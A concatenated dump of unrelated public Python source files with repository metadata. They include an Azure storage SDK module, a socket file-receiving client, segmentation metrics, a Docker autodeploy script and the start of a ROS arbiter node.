960b063de1598dccc26a68071d70052b7476c6d6 | 72b65247200e7cc9fd102522e9151ac7a7af3a00 | /Premier-eye.API/tests/test_math.py | 6e6970568ad204be05a77cdcdbd1b1fa0f783620 | [
"MIT"
] | permissive | Sapfir0/premier-eye | 52cfb2a28945e571d3d78e7c993ccaf54e1a0053 | ac6d90da101a5c2f2c305ba21f67369a0f3b786f | refs/heads/master | 2022-12-21T13:29:39.255657 | 2022-12-12T15:10:54 | 2022-12-12T15:10:54 | 195,695,701 | 18 | 4 | MIT | 2021-07-29T18:33:59 | 2019-07-07T20:49:27 | Python | UTF-8 | Python | false | false | 946 | py | import unittest
from services.geo import calibrateRect, divLatLonToNumber, subLatLon, addLatLon, mulLatLonToNumber, imageHeight, imageWidth
from cameraLocations import cameras
def getLatLonCoordinates(A, B, C, D, X, Y):
vBC = divLatLonToNumber(subLatLon(C, B), imageHeight)
vAD = divLatLonToNumber(subLatLon(D, A), imageHeight)
latlonPixel1 = addLatLon(mulLatLonToNumber(vBC, imageHeight- Y), B)
latlonPixel2 = addLatLon(mulLatLonToNumber(vAD, imageHeight - Y), A)
vG = divLatLonToNumber(subLatLon(latlonPixel2, latlonPixel1), imageWidth)
G = addLatLon(mulLatLonToNumber(vG, X), latlonPixel1)
return G
class Test_Math(unittest.TestCase):
def test_isMathEqual(self):
etalon = getLatLonCoordinates(*cameras[3]['view'], int(917.5), int(540))
newRes = calibrateRect(*cameras[3]['view'], int(917.5), int(540))
self.assertEqual(etalon, newRes)
if __name__ == '__main__':
unittest.main() | [
"sapfir999999@yandex.ru"
] | sapfir999999@yandex.ru |
461aedd8d00d14d677bdaaa5d221d39e7bd1f887 | d7016f69993570a1c55974582cda899ff70907ec | /sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_04_01/aio/operations/_table_services_operations.py | a773278f633a42e0385983cffb93ca8fbcf3224b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 17,622 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._table_services_operations import (
build_get_service_properties_request,
build_list_request,
build_set_service_properties_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TableServicesOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.storage.v2021_04_01.aio.StorageManagementClient`'s
:attr:`table_services` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def list(self, resource_group_name: str, account_name: str, **kwargs: Any) -> _models.ListTableServices:
"""List all table services for the storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive. Required.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only. Required.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListTableServices or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.ListTableServices
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-04-01")) # type: Literal["2021-04-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.ListTableServices]
request = build_list_request(
resource_group_name=resource_group_name,
account_name=account_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.CloudErrorAutoGenerated, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("ListTableServices", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/tableServices"} # type: ignore
@overload
async def set_service_properties(
self,
resource_group_name: str,
account_name: str,
table_service_name: Union[str, _models.Enum35],
parameters: _models.TableServiceProperties,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.TableServiceProperties:
"""Sets the properties of a storage account’s Table service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive. Required.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only. Required.
:type account_name: str
:param table_service_name: The name of the Table Service within the specified storage account.
Table Service Name must be 'default'. "default" Required.
:type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
:param parameters: The properties of a storage account’s Table service, only properties for
Storage Analytics and CORS (Cross-Origin Resource Sharing) rules can be specified. Required.
:type parameters: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TableServiceProperties or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def set_service_properties(
self,
resource_group_name: str,
account_name: str,
table_service_name: Union[str, _models.Enum35],
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.TableServiceProperties:
"""Sets the properties of a storage account’s Table service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive. Required.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only. Required.
:type account_name: str
:param table_service_name: The name of the Table Service within the specified storage account.
Table Service Name must be 'default'. "default" Required.
:type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
:param parameters: The properties of a storage account’s Table service, only properties for
Storage Analytics and CORS (Cross-Origin Resource Sharing) rules can be specified. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TableServiceProperties or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def set_service_properties(
self,
resource_group_name: str,
account_name: str,
table_service_name: Union[str, _models.Enum35],
parameters: Union[_models.TableServiceProperties, IO],
**kwargs: Any
) -> _models.TableServiceProperties:
"""Sets the properties of a storage account’s Table service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive. Required.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only. Required.
:type account_name: str
:param table_service_name: The name of the Table Service within the specified storage account.
Table Service Name must be 'default'. "default" Required.
:type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
:param parameters: The properties of a storage account’s Table service, only properties for
Storage Analytics and CORS (Cross-Origin Resource Sharing) rules can be specified. Is either a
model type or a IO type. Required.
:type parameters: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TableServiceProperties or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-04-01")) # type: Literal["2021-04-01"]
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[_models.TableServiceProperties]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "TableServiceProperties")
request = build_set_service_properties_request(
resource_group_name=resource_group_name,
account_name=account_name,
table_service_name=table_service_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.set_service_properties.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.CloudErrorAutoGenerated, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("TableServiceProperties", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_service_properties.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/tableServices/{tableServiceName}"} # type: ignore
@distributed_trace_async
async def get_service_properties(
self, resource_group_name: str, account_name: str, table_service_name: Union[str, _models.Enum35], **kwargs: Any
) -> _models.TableServiceProperties:
"""Gets the properties of a storage account’s Table service, including properties for Storage
Analytics and CORS (Cross-Origin Resource Sharing) rules.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive. Required.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only. Required.
:type account_name: str
:param table_service_name: The name of the Table Service within the specified storage account.
Table Service Name must be 'default'. "default" Required.
:type table_service_name: str or ~azure.mgmt.storage.v2021_04_01.models.Enum35
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TableServiceProperties or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_04_01.models.TableServiceProperties
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-04-01")) # type: Literal["2021-04-01"]
cls = kwargs.pop("cls", None) # type: ClsType[_models.TableServiceProperties]
request = build_get_service_properties_request(
resource_group_name=resource_group_name,
account_name=account_name,
table_service_name=table_service_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_service_properties.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = await self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.CloudErrorAutoGenerated, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("TableServiceProperties", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_service_properties.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/tableServices/{tableServiceName}"} # type: ignore
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
c0e9d9df60f11b5f2544999e5abb89e673a97ed5 | 770561db2432c67d9da4ef00fdb6ff00293a67a6 | /client2.py | c8e1a1988da8b960ec378fdbfb9e79ead82b0ee6 | [] | no_license | jinjinhui/secondRep | 6b48080790a6d761f2efac0e59c653a25240fff7 | 9661cabd6e0a4a7e931692372b2791fbb83403b1 | refs/heads/master | 2020-07-21T07:34:56.177925 | 2019-09-06T13:14:21 | 2019-09-06T13:14:21 | 206,778,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | from json import loads
from socket import socket
from base64 import b64decode
def main():
client=socket()
client.connect(('192.168.0.102',5577))
indata=bytes()
data=client.recv(1024)
while data:
indata+=data
data=client.recv(1024)
client.close()
jdata=indata.decode('utf-8')
mydict=loads(jdata)
filename=mydict['filename']
filedata=mydict['filedata']
with open('D:/python/'+filename,'wb') as f:
f.write(b64decode(filedata))
print('图片已保存!')
if __name__ == '__main__':
main()
| [
"54697065+jinjinhui@users.noreply.github.com"
] | 54697065+jinjinhui@users.noreply.github.com |
d5aa3876187ba82b50278ce252f8cdd1d0394950 | b1f9ac3ef8f8203be3ec723ed247bb8bc6e58efb | /utils/metrics.py | 2c39e692db22bf70d2128463edb79ab36411d9a9 | [] | no_license | aparecidovieira/SNUNet-CD---TensorFlow | 54a783a4a591ad0427465129959c33d6211e016d | 9164054e1467bdebffebc71019330261b94815f1 | refs/heads/main | 2023-05-01T13:48:48.579183 | 2021-05-19T01:18:39 | 2021-05-19T01:18:39 | 364,181,060 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,509 | py | import numpy as np
import cv2, shutil, os
from glob import glob
from . import data_loader as dl
import numpy as np
def get_labels(img, _type=True):
# if _type:
colors = {(0, 0, 0): 0, (0, 255, 0): 1, (255, 255, 255): 1}
h, w = img.shape[:2]
mask = np.zeros((h, w), dtype=np.uint8)
for color, value in colors.items():
indexes = np.all(img == np.array(color).reshape(1, 1, 3), axis=2)
mask[indexes] = value
mask = np.expand_dims(mask, axis=-1)
return mask
def change_labels(img):
h, w = img.shape[:2]
colors = [(0, 0, 0), (255, 255, 255)]
seg_img = np.zeros((h, w, 3))
for i in range(len(colors)):
seg_img[:, : , 0] = ((img[:, :] == i) * colors[i][0]).astype('uint8')
seg_img[:, : , 1] = ((img[:, :] == i) * colors[i][1]).astype('uint8')
seg_img[:, : , 2] = ((img[:, :] == i) * colors[i][2]).astype('uint8')
return seg_img
def get_image(path_img, masks=False):
img = cv2.imread(path_img, -1)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = np.float32(img) / 255.0
h, w = img.shape[:2]
if masks:
img = get_labels(img[:, :h, :])
else:
img = np.float32(img) / 255.0
return img
def get_IoU(y_pred, y_true, _class):
tp = np.count_nonzero(np.logical_and(y_pred == _class, y_true == _class))
fp = np.count_nonzero(np.logical_and(y_pred == _class, y_true != _class))
tn = np.count_nonzero(np.logical_and(y_pred != _class, y_true != _class))
fn = np.count_nonzero(np.logical_and(y_pred != _class, y_true == _class))
return (tp, fn, fp, tn)
def calculate_Iou(tp, fp, fn):
try:
return float(sum(tp))/(sum(tp) + sum(fp) + sum(fn))
except ZeroDivisionError:
return 0
def calculate_pixelAcc(tp, fn):
try :
return float(sum(tp))/(sum(tp) + sum(fn))
except ZeroDivisionError:
return 0
def calculateIoUEpoch(model, inputs_vals, checkpoint_dir, epoch_number):
val_files = [imgPath for imgPath in glob(inputs_vals + '*')][:]
print('Files for validation : ', len(val_files))
os.makedirs(checkpoint_dir, exist_ok=True)
classes = np.array([0, 1])
save_path = "%s/epoch/%s/"%(checkpoint_dir, epoch_number)
os.makedirs(save_path, exist_ok=True)
for filename in val_files:
name = os.path.basename(filename)
input_image = get_image(filename)
mask = get_image(filename.replace('val/', 'val_labels/'), masks=True)[:, :, 0].astype(int)
pred = model.predict(np.expand_dims(input_image, axis=0), batch_size=None, verbose=0, steps=None)
pred = np.round(pred[0,:,:,0]).astype(int) #(pred *255).astype(int)
bg_out, class_out = [], []
for _class in classes:
out = get_IoU(pred, mask, _class)
if _class == 0:
bg_out.append(out)
else:
class_out.append(out)
pred, mask = change_labels(pred), change_labels(mask)
img_out = np.concatenate((input_image * 255, mask, pred), axis=1)
cv2.imwrite(save_path + name, img_out)
class_out = np.array(class_out)
TP, FN, FP, TN = [list(class_out[:, i]) for i in range(4)]
class_iou = 100 * calculate_Iou(TP, FP, FN)
class_acc = 100 * calculate_pixelAcc(TP, FN)
bg_out = np.array(bg_out)
TP, FN, FP, TN = [list(bg_out[:, i]) for i in range(4)]
bg_iou = 100 * calculate_Iou(TP, FP, FN)
bg_acc = 100 * calculate_pixelAcc(TP, FN)
return bg_iou, class_iou, bg_acc, class_acc | [
"noreply@github.com"
] | aparecidovieira.noreply@github.com |
378150e1caf3fcaefdb2de1f6c8fe81288dfab48 | 8d3782a43521308f01748b3f6af8f45a6a17fa22 | /finalExamSandbox.py | 9dac555d939d82273dc352bf0c49211bdd6298de | [] | no_license | smurphy2230/csc-121-lesson14 | 34f3df11719a86c070dc855e43b8ba14a1e77163 | 13d5427aa4208ea4a057a6b6f74b790ee2d50c5b | refs/heads/master | 2022-07-04T16:50:19.747170 | 2020-05-07T20:03:32 | 2020-05-07T20:03:32 | 261,754,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | import random
for i in range(10):
num = random.randint(10, 20)
if num <= 15:
continue
print(num)
| [
"smurphy2230@gmail.com"
] | smurphy2230@gmail.com |
c7e0b7f1d1b7eca1a2eae88ea93db3e320a5d760 | 6ecde240069d771023abf3810293221da7a4839a | /check_system.py | fc27302e4bd989205a43e69118a702b5fbc38c47 | [
"BSD-3-Clause"
] | permissive | JoseAlanis/supplementary_dpx_tt | 91c91038857fd05030f302cbfb881dbd0753c6e1 | 2b5a94c35753dc9dbf51357c840a87380e40fe3c | refs/heads/master | 2021-08-16T15:16:05.341099 | 2021-04-29T09:43:18 | 2021-04-29T09:43:18 | 129,422,396 | 0 | 1 | BSD-3-Clause | 2021-04-29T09:43:19 | 2018-04-13T15:40:53 | Python | UTF-8 | Python | false | false | 1,874 | py | """
This script performs a series of checks on the system to see if everything is
ready to run the analysis pipeline.
"""
import os
import pkg_resources
from argparse import ArgumentParser
import json
import mne
from config import fname
from utils import validate_sourcedata
# Handle command line arguments
check_parser = ArgumentParser(description='Pars args for check system.')
check_parser.add_argument('-p', '--path', help='Path to validate.')
args = check_parser.parse_args()
parent_dir = args.path
# Check to see if the python dependencies are fulfilled.
dependencies = []
with open('./requirements.txt') as f:
for line in f:
line = line.strip()
if len(line) == 0 or line.startswith('#'):
continue
dependencies.append(line)
# This raises errors of dependencies are not met
pkg_resources.working_set.require(dependencies)
# Check that the data is present on the system
if not os.path.exists(fname.data_dir):
raise ValueError('The `data_dir` points to non-existent directory: ' +
fname.data_dir)
# Make sure the output directories exist
os.makedirs(fname.derivatives_dir, exist_ok=True)
# directories for reports
os.makedirs(fname.reports_dir, exist_ok=True)
# directories for results
os.makedirs(fname.results, exist_ok=True)
os.makedirs(fname.figures, exist_ok=True)
os.makedirs(fname.rt, exist_ok=True)
os.makedirs(fname.rois, exist_ok=True)
# prints some information about the system
mne.sys_info()
with open(fname.system_check, 'w') as f:
f.write('System check OK.')
# creates .json with results of sourcedata/ validation
data_val = validate_sourcedata(path=parent_dir, source_type=['eeg'])
with open('validator.json', 'w') as outfile:
json.dump(data_val, outfile, indent=4)
print("\nAll seems to be in order."
"\nYou can now run the entire pipeline with: python -m doit")
| [
"noreply@github.com"
] | JoseAlanis.noreply@github.com |
2107e1c8be217cbc0802fee26930472b7b05254c | 24e07b957c003478592bdd999bd0241faab749b0 | /scripts/autodeploy-url.py | a74c4331c173df03f16e94f7d1a0ca14c49dfd13 | [] | no_license | Commonjava/indy-docker | 458aa001c8d91b2fae9f9b43847f45c68f7500c4 | 204187b590e3bde99dd185ceb4486312e599d0c3 | refs/heads/master | 2020-04-15T01:38:43.422205 | 2016-06-14T21:22:50 | 2016-06-14T21:22:50 | 32,346,468 | 1 | 2 | null | 2016-06-22T20:45:24 | 2015-03-16T19:01:43 | Python | UTF-8 | Python | false | false | 7,777 | py | #!/usr/bin/python
#
# Copyright (C) 2015 John Casey (jdcasey@commonjava.org)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from lxml import objectify
from lxml import etree
import lxml
import httplib2
import os
import sys
import hashlib
import re
import shutil
from optparse import (OptionParser,BadOptionError,AmbiguousOptionError)
NAME='indy'
IMAGE='buildchimp/indy'
VERSIONFILE=os.path.join(os.environ.get('HOME'), '.autodeploy.last')
class Metadata(object):
def __init__(self, doc, verbose):
self.xml = doc
self.verbose = verbose
def getLatestSnapshot(self):
timestamp = None
build = None
if self.xml.versioning["snapshot"] is not None and len(self.xml.versioning.snapshot) > 0 and self.xml.versioning.snapshot.getchildren() and len(self.xml.versioning.snapshot.getchildren()):
if self.verbose is True:
print(lxml.objectify.dump(self.xml.versioning.snapshot))
timestamp = "{ts:.6f}".format(ts=float(self.xml.versioning.snapshot.timestamp))
build = self.xml.versioning.snapshot.buildNumber
if self.verbose is True:
print "Found timestamp: %s, build-number: %s" % (timestamp, build)
version = None
if timestamp is not None and len(self.xml.versioning.snapshotVersions) and self.xml.versioning.snapshotVersions.getchildren():
suffix = "%s-%s" % (timestamp, build)
if self.verbose is True:
print "Searching for version ending with: %s" % suffix
for v in self.xml.versioning.snapshotVersions['snapshotVersion']:
if v.getchildren():
ver = str(v.value)
if ver.endswith(suffix):
version = ver
break
if self.verbose is True:
print "Returning latest snapshot: %s" % version
return version
def getLatestRelease(self):
version = None
if self.xml.versioning.getchildren() and len(self.xml.versioning.getchildren()):
# TODO: If this is a FloatElement or similar, the string rendering will be WRONG.
# See snapshot timestamp above.
version = str(self.xml.versioning.release)
if self.verbose is True:
print "Returning latest release: %s" % version
return version
def run(cmd, fail=True):
print cmd
ret = os.system(cmd)
if fail and ret != 0:
print "%s (failed with code: %s)" % (cmd, ret)
sys.exit(ret)
def parse():
usage = """%prog [options] <init-script> [init-options]"""
parser = OptionParser(usage=usage)
parser.disable_interspersed_args()
parser.add_option('-i', '--image', help='The image to use when deploying (default: builchimp/indy)')
parser.add_option('-n', '--name', help='The container name under which to deploy Indy volume container (default: indy)')
parser.add_option('-N', '--noservice', action='store_true', help='Do not try to restart a systemd service')
parser.add_option('-r', '--release', action='store_true', help='Treat the metadata as version metadata, not snapshot metadata')
parser.add_option('-s', '--service', help='The systemd service to manage when redeploying (default: indy-server)')
parser.add_option('-S', '--unsafe-ssl', action='store_true', help='Disable verification of SSL certificate (DANGEROUS)')
parser.add_option('-u', '--url', help='URL to maven-metadata.xml to watch for updates')
parser.add_option('-v', '--verbose', action='store_true', help='Turn on verbose feedback')
parser.add_option('-V', '--versionfile', help='File to track the last deployed version of Indy')
opts, args = parser.parse_args()
if opts.verbose is True:
print "Args: '%s'" % " ".join(args)
init_cmd_template = " ".join(args)
if not '{url}' in init_cmd_template:
init_cmd_template += " --url='{url}'"
print "Init command template:\n %s" % init_cmd_template
return (opts, init_cmd_template)
def getMetadataVersion(opts):
disable_ssl_validation = opts.unsafe_ssl or False
http_client = httplib2.Http(disable_ssl_certificate_validation=disable_ssl_validation)
headers = {
'Accept': 'application/xml',
'Content-Type': 'application/xml',
}
if opts.verbose is True:
print "Parsing metadata at: %s" % opts.url
response,content = http_client.request(opts.url, headers=headers)
if response.status == 404:
if opts.verbose is True:
print "%s not found" % url
sys.exit(0)
elif response.status != 200:
print "GET %s failed: %s" % (path, response.status)
sys.exit(1)
if opts.verbose is True:
print "Parsing xml:\n%s" % content
doc = objectify.fromstring(content)
meta = Metadata(doc, verbose=opts.verbose)
if opts.release is True:
return meta.getLatestRelease()
else:
return meta.getLatestSnapshot()
def deploy(opts, init_cmd):
print "Deploying: '%s'" % init_cmd
name = opts.name or NAME
image = opts.image or IMAGE
if opts.noservice is not True and opts.service and os.path.exists("/bin/systemctl"):
if opts.verbose is True:
print "Stopping service: %s" % opts.service
run("systemctl stop %s" % opts.service)
if opts.verbose is True:
print "Shutting down existing docker container"
run("docker stop %s" % name, fail=False)
run("docker rm %s" % name, fail=False)
run("docker pull %s" % image, fail=False)
if opts.verbose is True:
print "Running init command: %s" % init_cmd
run(init_cmd)
if opts.noservice is not True and opts.service and os.path.exists("/bin/systemctl"):
print "Starting service: %s" % opts.service
run("systemctl start %s" % opts.service)
def do(opts, init_cmd_template):
version = getMetadataVersion(opts)
if opts.verbose is True:
print "Version from metadata is: %s" % version
if version is None:
if opts.verbose is True:
print "No versions available in metadata: %s" % opts.url
sys.exit(0)
versionfile = opts.versionfile or VERSIONFILE
if opts.verbose is True:
print "Checking last-deployed version recorded in: %s" % versionfile
deployed_version = None
if os.path.exists(versionfile) and os.path.isfile(versionfile):
with open(versionfile, "r") as vf:
deployed_version=vf.read().replace('\n', '')
if opts.verbose is True:
print "Last deployed version is: %s" % deployed_version
if deployed_version is not None and version == deployed_version:
if opts.verbose is True:
print "No new versions available in metadata: %s (deployed version: %s, metadata version: %s)" % (opts.url, deployed_version, version)
sys.exit(0)
else:
base_url = os.path.dirname(opts.url)
if opts.release is True:
artifact_id = os.path.basename(base_url)
url = "{base}/{version}/{artifact_id}-{version}-launcher.tar.gz".format(base=base_url, version=version, artifact_id=artifact_id)
else:
artifact_id = os.path.basename(os.path.dirname(base_url))
url = "{base}/{artifact_id}-{version}-launcher.tar.gz".format(base=base_url, version=version, artifact_id=artifact_id)
if opts.verbose is True:
print "Deployment URL: %s" % url
if url is not None:
deploy(opts, init_cmd_template.format(url=url))
with open(versionfile, "w+") as vf:
vf.write(version)
if __name__ == '__main__':
(opts, init_cmd_template) = parse()
do(opts, init_cmd_template)
| [
"jdcasey@commonjava.org"
] | jdcasey@commonjava.org |
45eea6cdfabe5bed18934e9819c94d41559a4231 | 6475f00264529437a29081ea174eef4a7c0d0846 | /iarc_arbiter/scripts/arbiter.py | 6518843af396f23f9377ed11e17a4ba6dec17a32 | [] | no_license | SiChiTong/iarc-2017 | 2bd01803a8ab54c438b0cfdab94bd26c55c97bb3 | 5ee36f92d033f786cae0ae2bc1713cd60fb51fd7 | refs/heads/master | 2020-04-05T14:31:25.986131 | 2018-05-14T15:03:54 | 2018-05-14T15:03:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,234 | py | #!/usr/bin/env python2
from threading import Thread
import rospy
from ddynamic_reconfigure_python.ddynamic_reconfigure import DDynamicReconfigure
from geometry_msgs.msg import Twist, PoseStamped
from iarc_arbiter.msg import RegisterBehavior
from iarc_arbiter.msg import VelAlt
from std_msgs.msg import Empty, String
from tf import TransformListener
import transformers
class Arbiter:
"""
The Arbiter is a mutiplexer that reads cmd_* topics from several namespaces, converts them into
standard cmd_vel form, and forwards one of them into the global namespace.
It receives information about which behavior (namespace) should be selected from String messages
on the /arbiter/activate_behavior topic. This information comes from the planning stack.
In the future, a voting system could replace this mechanism.
The special value "zero" represents an internal behavior that stops the vehicle.
It also publishes the name of the active behavior to arbiter/active_behavior.
"""
def __init__(self):
# The Null behavior will automatically process a 0-velocity Twist at 10hz
self.null_behavior = Behavior(self.process_command, 'zero', freq=10)
self.behaviors = {'zero': self.null_behavior}
self.active_behavior_name = 'zero'
self.set_active_behavior('zero')
self.tf = TransformListener()
self.ddynrec = DDynamicReconfigure("example_dyn_rec")
# Transformers are functions capable of processing incoming data in a variety of formats.
# They are functions that take input of whatever type the topic is, and produce a transformers.Command
# object.
alt_pid = transformers.PIDAltController(self.tf, self.ddynrec)
